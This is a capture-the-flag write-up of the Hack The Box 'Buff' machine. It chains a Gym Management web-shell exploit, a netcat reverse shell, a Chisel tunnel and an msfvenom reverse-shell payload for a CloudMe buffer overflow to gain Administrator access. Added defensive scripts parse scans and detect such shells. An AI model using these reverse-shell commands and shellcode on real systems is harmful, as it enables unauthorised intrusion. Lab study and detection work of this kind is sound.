My first step was to run Nmap against the host to identify running services:
# Nmap 7.91 scan initiated Fri Nov 20 14:21:08 2020 as: nmap -sV -O -p- -sC -oN scan 10.10.10.198
Nmap scan report for 10.10.10.198
Host is up (0.024s latency).
Not shown: 65533 filtered ports
PORT STATE SERVICE VERSION
7680/tcp open pando-pub?
8080/tcp open http Apache httpd 2.4.43 ((Win64) OpenSSL/1.1.1g PHP/7.4.6)
| http-open-proxy: Potentially OPEN proxy.
|_Methods supported:CONNECTION
|_http-server-header: Apache/2.4.43 (Win64) OpenSSL/1.1.1g PHP/7.4.6
|_http-title: mrb3n's Bro Hut
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows XP|7 (89%)
OS CPE: cpe:/o:microsoft:windows_xp::sp3 cpe:/o:microsoft:windows_7
Aggressive OS guesses: Microsoft Windows XP SP3 (89%), Microsoft Windows XP SP2 (86%), Microsoft Windows 7 (85%)
No exact OS matches for host (test conditions non-ideal).
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Fri Nov 20 14:24:09 2020 -- 1 IP address (1 host up) scanned in 181.05 seconds
From the output you can see there are 2 services running: HTTP on port 8080 and Pando-pub on port 7680. I decided to start with HTTP. Browsing to the website shows a page relating to fitness. After browsing the site and looking at the contact page, I found it was created by Gym Management Software 1.0. I did a Google search for exploits involving this software and discovered this one. I downloaded the exploit and ran it as advertised, and it successfully generated a shell on the Buff machine.
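The scan above is the kind of output that gets read by eye once and then lost. As an added example (not code from the original writeup), the script below parses Nmap's normal (-oN) format into a per-port inventory, keeps each NSE script's output attached to its port, and applies a few triage rules: an open-proxy finding, a service whose fingerprint Nmap could not confirm (the trailing `?`), and a banner that discloses a PHP version. The sample text is a constructed excerpt modelled on the scan shown above.

```python
"""Parse Nmap normal (-oN) output into a per-port inventory and flag the
findings worth following up.  Added example for this writeup, not code from
the original post; SAMPLE_SCAN is a constructed excerpt modelled on the scan
output above."""
import re

SAMPLE_SCAN = """\
# Nmap 7.91 scan initiated Fri Nov 20 14:21:08 2020 as: nmap -sV -O -p- -sC -oN scan 10.10.10.198
Nmap scan report for 10.10.10.198
Host is up (0.024s latency).
Not shown: 65533 filtered ports
PORT     STATE SERVICE   VERSION
7680/tcp open  pando-pub?
8080/tcp open  http      Apache httpd 2.4.43 ((Win64) OpenSSL/1.1.1g PHP/7.4.6)
| http-open-proxy: Potentially OPEN proxy.
|_Methods supported:CONNECTION
|_http-server-header: Apache/2.4.43 (Win64) OpenSSL/1.1.1g PHP/7.4.6
|_http-title: mrb3n's Bro Hut
"""

# "8080/tcp open  http  Apache httpd 2.4.43 ..." -> port, proto, state, service, version
PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)\s*(.*)$")
# First line of an NSE script result once the "|"/"|_" prefix is stripped: "name: value"
SCRIPT_RE = re.compile(r"^([\w-]+):\s*(.*)$")


def parse_nmap_normal(text):
    """Return one dict per port line, each carrying the NSE script output
    printed under it.  Continuation lines (no "name:" prefix) are joined onto
    the script they belong to."""
    ports = []
    current_script = None
    for line in text.splitlines():
        m = PORT_RE.match(line)
        if m:
            port, proto, state, service, version = m.groups()
            ports.append({"port": int(port), "proto": proto, "state": state,
                          "service": service, "version": version.strip(),
                          "scripts": {}})
            current_script = None
            continue
        if line.startswith("|") and ports:
            body = line.lstrip("|_ ").strip()
            m = SCRIPT_RE.match(body)
            if m:
                current_script, value = m.groups()
                ports[-1]["scripts"][current_script] = value.strip()
            elif current_script:
                ports[-1]["scripts"][current_script] += " " + body
    return ports


def review(ports):
    """Triage rules applied to the inventory: open proxies, services Nmap could
    not fingerprint, and banners that disclose a scripting runtime version."""
    findings = []
    for p in ports:
        if p["state"] != "open":
            continue
        scripts = p["scripts"]
        if "http-open-proxy" in scripts:
            findings.append((p["port"], "possible open proxy: " + scripts["http-open-proxy"]))
        if p["service"].endswith("?"):
            findings.append((p["port"], "service fingerprint uncertain (" + p["service"] + ")"))
        if "PHP/" in p["version"]:
            findings.append((p["port"], "server banner discloses PHP version: " + p["version"]))
    return findings


if __name__ == "__main__":
    for port, note in review(parse_nmap_normal(SAMPLE_SCAN)):
        print(f"{port}: {note}")
```

Run against a real `-oN` file by reading it into `parse_nmap_normal`; the rules in `review` are deliberately simple so that a team can extend them with its own banner and script checks.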
┌──(root💀kali)-[/home/kali/Documents/buff]
└─# python 48506.py http://10.10.10.198:8080/ 1 ⨯
/\
/vvvvvvvvvvvv \--------------------------------------,
`^^^^^^^^^^^^ /============BOKU====================="
\/
[+] Successfully connected to webshell.
C:\xampp\htdocs\gym\upload> dir
�PNG
▒
Volume in drive C has no label.
Volume Serial Number is A22D-49F7
Directory of C:\xampp\htdocs\gym\upload
24/11/2020 18:25 <DIR> .
24/11/2020 18:25 <DIR> ..
24/11/2020 18:25 53 kamehameha.php
1 File(s) 53 bytes
2 Dir(s) 7,133,868,032 bytes free
From here I was able to capture the user flag from the Shaun account.
C:\xampp\htdocs\gym\upload> type c:\users\shaun\Desktop\user.txt
�PNG
▒
[REDACTED]
The next step was to escalate privileges. I first created a persistent reverse shell to make it easier to enumerate the machine. I copied netcat to the Buff machine using Impacket's SMB server.
┌──(root💀kali)-[/var/www]
└─# python3 smbserver.py testshare -smb2support /var/www/
Impacket v0.9.21 - Copyright 2020 SecureAuth Corporation
I copied nc.exe into /var/www, then copied it from the share to the Buff machine:
C:\xampp\htdocs\gym\upload> copy \\10.10.14.19\testshare\nc.exe
�PNG
▒
1 file(s) copied.
I then started a listener on Kali on port 2600:
┌──(root💀kali)-[/home/kali]
└─# nc -nvlp 2600
I then ran Netcat on Buff, sending a PowerShell session to port 2700 on Kali:
C:\xampp\htdocs\gym\upload> nc.exe 10.10.14.19 2600 -e powershell
┌──(root💀kali)-[/home/kali]
└─# nc -nvlp 2600 1 ⨯
listening on [any] 2600 ...
connect to [10.10.14.19] from (UNKNOWN) [10.10.10.198] 49708
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.
PS C:\xampp\htdocs\gym\upload>
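The shell above leaves two clear traces in process-creation telemetry: netcat started with `-e` to hand a shell to a remote listener, and a shell or netcat binary whose parent is the web server process (the web shell is executing under Apache). As an added example, not code from the original writeup, the script below runs those two rules over a constructed set of process-creation events in the shape Sysmon event ID 1 provides (pid, image, parent image, command line). The event set is constructed, and the httpd.exe parent for the nc.exe event is an assumption about how the XAMPP web shell would spawn it.

```python
"""Flag process-creation events that look like the reverse shell above: netcat
run with -e/-c to hand a shell to a remote listener, and shells or netcat
spawned by the web server process (the signature of a web shell).  Added
example for this writeup, not code from the original post.  SAMPLE_EVENTS are
constructed; the httpd.exe parent of the nc.exe event is an assumption about
how the XAMPP web shell would spawn it."""

NETCAT_IMAGES = {"nc.exe", "nc64.exe", "ncat.exe", "netcat.exe"}
SHELL_IMAGES = {"cmd.exe", "powershell.exe", "pwsh.exe"}
WEB_SERVER_IMAGES = {"httpd.exe", "w3wp.exe", "nginx.exe", "php-cgi.exe", "tomcat.exe"}

SAMPLE_EVENTS = [
    {"pid": 7796, "image": r"C:\xampp\htdocs\gym\upload\nc.exe",
     "parent": r"C:\xampp\apache\bin\httpd.exe",
     "cmdline": "nc.exe 10.10.14.19 2600 -e powershell"},
    {"pid": 4120, "image": r"C:\Windows\System32\cmd.exe",
     "parent": r"C:\Windows\explorer.exe",
     "cmdline": r"cmd.exe /c dir C:\Users\shaun\Downloads"},
    {"pid": 5330, "image": r"C:\Tools\ncat.exe",
     "parent": r"C:\Windows\System32\cmd.exe",
     "cmdline": "ncat.exe -nvlp 4444 -e cmd.exe"},
    {"pid": 6010, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent": r"C:\xampp\apache\bin\httpd.exe",
     "cmdline": "powershell.exe -nop -w hidden -c whoami"},
]


def image_name(path):
    """Basename of a Windows or POSIX path, lower-cased for comparison."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def classify(event):
    """Return the list of reasons this event is suspicious (empty if none)."""
    reasons = []
    image = image_name(event["image"])
    parent = image_name(event["parent"])
    args = event["cmdline"].split()
    if image in NETCAT_IMAGES:
        # -e (and -c on ncat) execute the named program with stdin/stdout on the socket
        for i, arg in enumerate(args):
            if arg.lower() in ("-e", "-c") and i + 1 < len(args):
                reasons.append(f"netcat executing '{args[i + 1]}' via {arg}")
    if parent in WEB_SERVER_IMAGES and image in NETCAT_IMAGES | SHELL_IMAGES:
        reasons.append(f"{image} spawned by web server process {parent}")
    return reasons


def triage(events):
    """Map pid -> reasons for every event that trips at least one rule."""
    return {e["pid"]: classify(e) for e in events if classify(e)}


if __name__ == "__main__":
    for pid, reasons in triage(SAMPLE_EVENTS).items():
        print(pid, "; ".join(reasons))
```

The parent-process rule is the more durable of the two: renaming nc.exe defeats the image-name check, but a shell whose parent is httpd.exe is anomalous on almost any web server regardless of what binary is involved.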
The listener output confirms that the reverse shell connected back successfully. I next browsed around the machine looking for anything that could provide privilege escalation, and discovered a file called CloudMe_1122.exe in the Downloads folder.
PS C:\Users\shaun\Downloads> dir
dir
Directory: C:\Users\shaun\Downloads
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 16/06/2020 16:26 17830824 CloudMe_1112.exe
PS C:\Users\shaun\Downloads>
After some Googling I discovered that this program listens on port 8888. I ran netstat and found there was indeed a service listening locally on port 8888, so it was very likely the CloudMe software.
PS C:\Users\shaun\Downloads> netstat -ano
netstat -ano
Active Connections
Proto Local Address Foreign Address State PID
TCP 0.0.0.0:135 0.0.0.0:0 LISTENING 952
TCP 0.0.0.0:445 0.0.0.0:0 LISTENING 4
TCP 0.0.0.0:5040 0.0.0.0:0 LISTENING 5708
TCP 0.0.0.0:7680 0.0.0.0:0 LISTENING 6508
TCP 0.0.0.0:8080 0.0.0.0:0 LISTENING 6544
TCP 0.0.0.0:49664 0.0.0.0:0 LISTENING 524
TCP 0.0.0.0:49665 0.0.0.0:0 LISTENING 1052
TCP 0.0.0.0:49666 0.0.0.0:0 LISTENING 1580
TCP 0.0.0.0:49667 0.0.0.0:0 LISTENING 2236
TCP 0.0.0.0:49668 0.0.0.0:0 LISTENING 668
TCP 0.0.0.0:49669 0.0.0.0:0 LISTENING 684
TCP 10.10.10.198:139 0.0.0.0:0 LISTENING 4
TCP 10.10.10.198:8080 10.10.14.19:54178 CLOSE_WAIT 6544
TCP 10.10.10.198:8080 10.10.14.19:54182 CLOSE_WAIT 6544
TCP 10.10.10.198:8080 10.10.14.19:54220 ESTABLISHED 6544
TCP 10.10.10.198:49677 10.10.14.19:2600 CLOSE_WAIT 7792
TCP 10.10.10.198:49686 10.10.14.19:2700 ESTABLISHED 3576
TCP 10.10.10.198:49688 10.10.14.19:2600 CLOSE_WAIT 7368
TCP 10.10.10.198:49690 10.10.14.19:2700 ESTABLISHED 7820
TCP 10.10.10.198:49703 10.10.14.19:2525 ESTABLISHED 3140
TCP 10.10.10.198:49708 10.10.14.19:2600 ESTABLISHED 7796
TCP 127.0.0.1:3306 0.0.0.0:0 LISTENING 6348
TCP 127.0.0.1:8888 0.0.0.0:0 LISTENING 5860
TCP [::]:135 [::]:0 LISTENING 952
TCP [::]:445 [::]:0 LISTENING 4
TCP [::]:7680 [::]:0 LISTENING 6508
TCP [::]:8080 [::]:0 LISTENING 6544
TCP [::]:49664 [::]:0 LISTENING 524
TCP [::]:49665 [::]:0 LISTENING 1052
TCP [::]:49666 [::]:0 LISTENING 1580
TCP [::]:49667 [::]:0 LISTENING 2236
TCP [::]:49668 [::]:0 LISTENING 668
TCP [::]:49669 [::]:0 LISTENING 684
UDP 0.0.0.0:123 *:* 3964
UDP 0.0.0.0:5050 *:* 5708
UDP 0.0.0.0:5353 *:* 1124
UDP 0.0.0.0:5355 *:* 1124
UDP 0.0.0.0:51203 *:* 1124
UDP 0.0.0.0:59591 *:* 1124
UDP 0.0.0.0:62872 *:* 1124
UDP 0.0.0.0:65365 *:* 1124
UDP 10.10.10.198:137 *:* 4
UDP 10.10.10.198:138 *:* 4
UDP 10.10.10.198:1900 *:* 6064
UDP 10.10.10.198:63108 *:* 6064
UDP 127.0.0.1:1900 *:* 6064
UDP 127.0.0.1:63109 *:* 6064
UDP 127.0.0.1:63756 *:* 3060
UDP [::]:123 *:* 3964
UDP [::]:5353 *:* 1124
UDP [::]:5355 *:* 1124
UDP [::]:51203 *:* 1124
UDP [::]:59591 *:* 1124
UDP [::]:62872 *:* 1124
UDP [::]:65365 *:* 1124
UDP [::1]:1900 *:* 6064
UDP [::1]:63107 *:* 6064
UDP [fe80::6533:1880:c4d1:fb8f%10]:1900 *:* 6064
UDP [fe80::6533:1880:c4d1:fb8f%10]:63106 *:* 6064
PS C:\Users\shaun\Downloads>
I did some searching for an exploit for CloudMe and discovered this one. The only difficulty is that this is a remote buffer overflow exploit, and the CloudMe service is only listening on localhost, so it can't be reached from the Kali machine. The way to circumvent this is to reverse tunnel the service on port 8888 to Kali so it can be accessed remotely. I did this using a tool called Chisel.
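The netstat listing above carries two lessons for whoever is reviewing the host rather than attacking it: a service bound to 127.0.0.1 is invisible to a port scan but fully reachable by anything already running on the box (and, through a reverse tunnel like the one set up next, by a remote party too), and every reverse shell or tunnel client shows up as a session from an ephemeral local port to an outside host on a port nobody expects. As an added example (not code from the original writeup), the script below parses `netstat -ano` output, lists loopback-only TCP listeners, and lists outbound sessions to non-loopback peers on ports outside an expected set, keeping CLOSE_WAIT as well as ESTABLISHED since a half-closed session to an odd port is a dropped shell rather than noise. The sample is a constructed excerpt modelled on the listing above.

```python
"""Triage a Windows `netstat -ano` listing: loopback-only listeners (reachable
from the host, or over a tunnel, but not from the network) and sessions to
outside hosts on unexpected ports (reverse shells and tunnel clients).  Added
example for this writeup, not code from the original post; SAMPLE_NETSTAT is
a constructed excerpt modelled on the listing above."""
import re

SAMPLE_NETSTAT = """\
Active Connections

  Proto  Local Address          Foreign Address        State           PID
  TCP    0.0.0.0:8080           0.0.0.0:0              LISTENING       6544
  TCP    10.10.10.198:8080      10.10.14.19:54220      ESTABLISHED     6544
  TCP    10.10.10.198:49677     10.10.14.19:2600       CLOSE_WAIT      7792
  TCP    10.10.10.198:49686     10.10.14.19:2700       ESTABLISHED     3576
  TCP    10.10.10.198:49703     10.10.14.19:2525       ESTABLISHED     3140
  TCP    10.10.10.198:49708     10.10.14.19:2600       ESTABLISHED     7796
  TCP    127.0.0.1:3306         0.0.0.0:0              LISTENING       6348
  TCP    127.0.0.1:8888         0.0.0.0:0              LISTENING       5860
  TCP    [::]:445               [::]:0                 LISTENING       4
  UDP    0.0.0.0:123            *:*                                    3964
"""

# TCP rows carry a State column; UDP rows do not, hence the optional group.
ROW_RE = re.compile(r"^\s*(TCP|UDP)\s+(\S+)\s+(\S+)(?:\s+([A-Z_]+))?\s+(\d+)\s*$")
LOOPBACK = {"127.0.0.1", "[::1]"}


def split_endpoint(addr):
    """'10.10.10.198:49708' -> ('10.10.10.198', 49708); '[::]:445' -> ('[::]', 445);
    '*:*' -> ('*', None).  The port is the text after the last colon, which keeps
    bracketed IPv6 addresses intact."""
    host, _, port = addr.rpartition(":")
    return host, (int(port) if port.isdigit() else None)


def parse_netstat(text):
    rows = []
    for line in text.splitlines():
        m = ROW_RE.match(line)
        if not m:
            continue
        proto, local, foreign, state, pid = m.groups()
        lhost, lport = split_endpoint(local)
        fhost, fport = split_endpoint(foreign)
        rows.append({"proto": proto, "lhost": lhost, "lport": lport,
                     "fhost": fhost, "fport": fport, "state": state, "pid": int(pid)})
    return rows


def loopback_only_listeners(rows):
    """TCP listeners bound to 127.0.0.1 or [::1], as (port, pid)."""
    return [(r["lport"], r["pid"]) for r in rows
            if r["proto"] == "TCP" and r["state"] == "LISTENING" and r["lhost"] in LOOPBACK]


def external_sessions(rows, expected_ports=frozenset({80, 443})):
    """Outbound TCP sessions (local port is not one we listen on) to a
    non-loopback peer on a port outside expected_ports, as
    (peer host, peer port, state, pid)."""
    listening = {r["lport"] for r in rows if r["state"] == "LISTENING"}
    hits = []
    for r in rows:
        if r["proto"] != "TCP" or r["state"] not in ("ESTABLISHED", "CLOSE_WAIT"):
            continue
        if r["lport"] in listening:          # inbound to one of our own services
            continue
        if r["fhost"] in LOOPBACK or r["fport"] in expected_ports:
            continue
        hits.append((r["fhost"], r["fport"], r["state"], r["pid"]))
    return hits


if __name__ == "__main__":
    rows = parse_netstat(SAMPLE_NETSTAT)
    print("loopback-only listeners:", loopback_only_listeners(rows))
    print("external sessions:", external_sessions(rows))
```

On the sample the external-session list is exactly the attacker's footprint from this writeup: the netcat shells on 2600 and the tunnel and exploit callbacks on 2700 and 2525, each tied to a PID that `tasklist` or Process Explorer can resolve to a binary.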
I began by starting the Chisel server on the Kali machine. This is what the client on the Buff machine will connect to in order to create the tunnel.
┌──(root💀kali)-[/home/kali/Documents/buff]
└─# chisel server -p 2700 --host 10.10.14.19 --reverse
I next copied Chisel to the Buff machine using the same method used previously for netcat. The Chisel client was then run, forwarding port 8888 to Kali so that it is accessible there on port 2850.
PS C:\xampp\htdocs\gym\upload> ./chisel.exe client 10.10.14.19:2700 R:2850:127.0.0.1:8888
./chisel.exe client 10.10.14.19:2700 R:2850:127.0.0.1:8888
2020/12/04 18:32:02 client: Connecting to ws://10.10.14.19:2700
2020/12/04 18:32:02 client: Connected (Latency 22.261ms)
This means that port 8888 on Buff can be reached from the Kali machine at 127.0.0.1:2850, so I now had to run the exploit against that port.
The exploit requires some minor editing before it can be run. The payload needed to be altered so that a reverse shell is spawned rather than calc.exe. The port also had to be modified so the exploit connects to port 2850 rather than 8888.
I generated the payload using the following command:
┌──(root💀kali)-[/usr/share/windows-resources/binaries]
└─# msfvenom -a x86 -p windows/shell_reverse_tcp LHOST=10.10.14.19 LPORT=2525 -b '\x00\x0A\x0D' -f python 1 ⨯
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
Found 11 compatible encoders
Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 351 (iteration=0)
x86/shikata_ga_nai chosen with final size 351
Payload size: 351 bytes
Final size of python file: 1712 bytes
buf = b""
buf += b"\xba\x4b\xab\xb3\x24\xda\xcd\xd9\x74\x24\xf4\x5f\x29"
buf += b"\xc9\xb1\x52\x83\xc7\x04\x31\x57\x0e\x03\x1c\xa5\x51"
buf += b"\xd1\x5e\x51\x17\x1a\x9e\xa2\x78\x92\x7b\x93\xb8\xc0"
buf += b"\x08\x84\x08\x82\x5c\x29\xe2\xc6\x74\xba\x86\xce\x7b"
buf += b"\x0b\x2c\x29\xb2\x8c\x1d\x09\xd5\x0e\x5c\x5e\x35\x2e"
buf += b"\xaf\x93\x34\x77\xd2\x5e\x64\x20\x98\xcd\x98\x45\xd4"
buf += b"\xcd\x13\x15\xf8\x55\xc0\xee\xfb\x74\x57\x64\xa2\x56"
buf += b"\x56\xa9\xde\xde\x40\xae\xdb\xa9\xfb\x04\x97\x2b\x2d"
buf += b"\x55\x58\x87\x10\x59\xab\xd9\x55\x5e\x54\xac\xaf\x9c"
buf += b"\xe9\xb7\x74\xde\x35\x3d\x6e\x78\xbd\xe5\x4a\x78\x12"
buf += b"\x73\x19\x76\xdf\xf7\x45\x9b\xde\xd4\xfe\xa7\x6b\xdb"
buf += b"\xd0\x21\x2f\xf8\xf4\x6a\xeb\x61\xad\xd6\x5a\x9d\xad"
buf += b"\xb8\x03\x3b\xa6\x55\x57\x36\xe5\x31\x94\x7b\x15\xc2"
buf += b"\xb2\x0c\x66\xf0\x1d\xa7\xe0\xb8\xd6\x61\xf7\xbf\xcc"
buf += b"\xd6\x67\x3e\xef\x26\xae\x85\xbb\x76\xd8\x2c\xc4\x1c"
buf += b"\x18\xd0\x11\xb2\x48\x7e\xca\x73\x38\x3e\xba\x1b\x52"
buf += b"\xb1\xe5\x3c\x5d\x1b\x8e\xd7\xa4\xcc\xbb\x2d\xa8\x1f"
buf += b"\xd4\x33\xb4\x16\xf9\xbd\x52\x42\x11\xe8\xcd\xfb\x88"
buf += b"\xb1\x85\x9a\x55\x6c\xe0\x9d\xde\x83\x15\x53\x17\xe9"
buf += b"\x05\x04\xd7\xa4\x77\x83\xe8\x12\x1f\x4f\x7a\xf9\xdf"
buf += b"\x06\x67\x56\x88\x4f\x59\xaf\x5c\x62\xc0\x19\x42\x7f"
buf += b"\x94\x62\xc6\xa4\x65\x6c\xc7\x29\xd1\x4a\xd7\xf7\xda"
buf += b"\xd6\x83\xa7\x8c\x80\x7d\x0e\x67\x63\xd7\xd8\xd4\x2d"
buf += b"\xbf\x9d\x16\xee\xb9\xa1\x72\x98\x25\x13\x2b\xdd\x5a"
buf += b"\x9c\xbb\xe9\x23\xc0\x5b\x15\xfe\x40\x6b\x5c\xa2\xe1"
buf += b"\xe4\x39\x37\xb0\x68\xba\xe2\xf7\x94\x39\x06\x88\x62"
buf += b"\x21\x63\x8d\x2f\xe5\x98\xff\x20\x80\x9e\xac\x41\x81"
The payload was then added to the exploit. I also modified the port from 8888 to 2850:
# Connection section of the exploit after editing: the port is now 2850 (the
# Chisel listener on Kali) instead of the original 8888. `socket` and `sys` are
# imported, and `target` and `buf` are defined, earlier in the script.
try:
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((target, 2850))
    s.send(buf)
except Exception as e:
    # print(e) works on both Python 2 and 3; sys.exc_value is Python 2 only
    print(e)
Once these changes had been made, I created a netcat listener on port 2525, as specified in the payload I generated:
┌──(kali㉿kali)-[~]
└─$ nc -nvlp 2525
listening on [any] 2525 ...
The exploit was then run:
┌──(root💀kali)-[/home/kali/Documents/buff]
└─# python 48389.py
┌──(kali㉿kali)-[~]
└─$ nc -nvlp 2525
listening on [any] 2525 ...
connect to [10.10.14.19] from (UNKNOWN) [10.10.10.198] 49703
Microsoft Windows [Version 10.0.17134.1610]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
whoami
buff\administrator
C:\Windows\system32>cd /
cd /
C:\>cd users
cd users
C:\Users>dir
dir
Volume in drive C has no label.
Volume Serial Number is A22D-49F7
Directory of C:\Users
16/06/2020 19:52 <DIR> .
16/06/2020 19:52 <DIR> ..
20/07/2020 11:08 <DIR> Administrator
16/06/2020 14:08 <DIR> Public
16/06/2020 14:11 <DIR> shaun
0 File(s) 0 bytes
5 Dir(s) 7,280,562,176 bytes free
C:\Users>Administrator
cd Administrator
C:\Users\Administrator>cd Desktop
cd Desktop
C:\Users\Administrator\Desktop>ir
dir
Volume in drive C has no label.
Volume Serial Number is A22D-49F7
Directory of C:\Users\Administrator\Desktop
18/07/2020 16:36 <DIR> .
18/07/2020 16:36 <DIR> ..
16/06/2020 15:41 1,417 Microsoft Edge.lnk
04/12/2020 18:23 34 root.txt
2 File(s) 1,451 bytes
2 Dir(s) 7,280,562,176 bytes free
C:\Users\Administrator\Desktop>type root.txt
type root.txt
[REDACTED]
As you can see from the output, the exploit worked: the reverse shell was caught by the netcat listener as the Administrator user, and I was able to capture the root flag.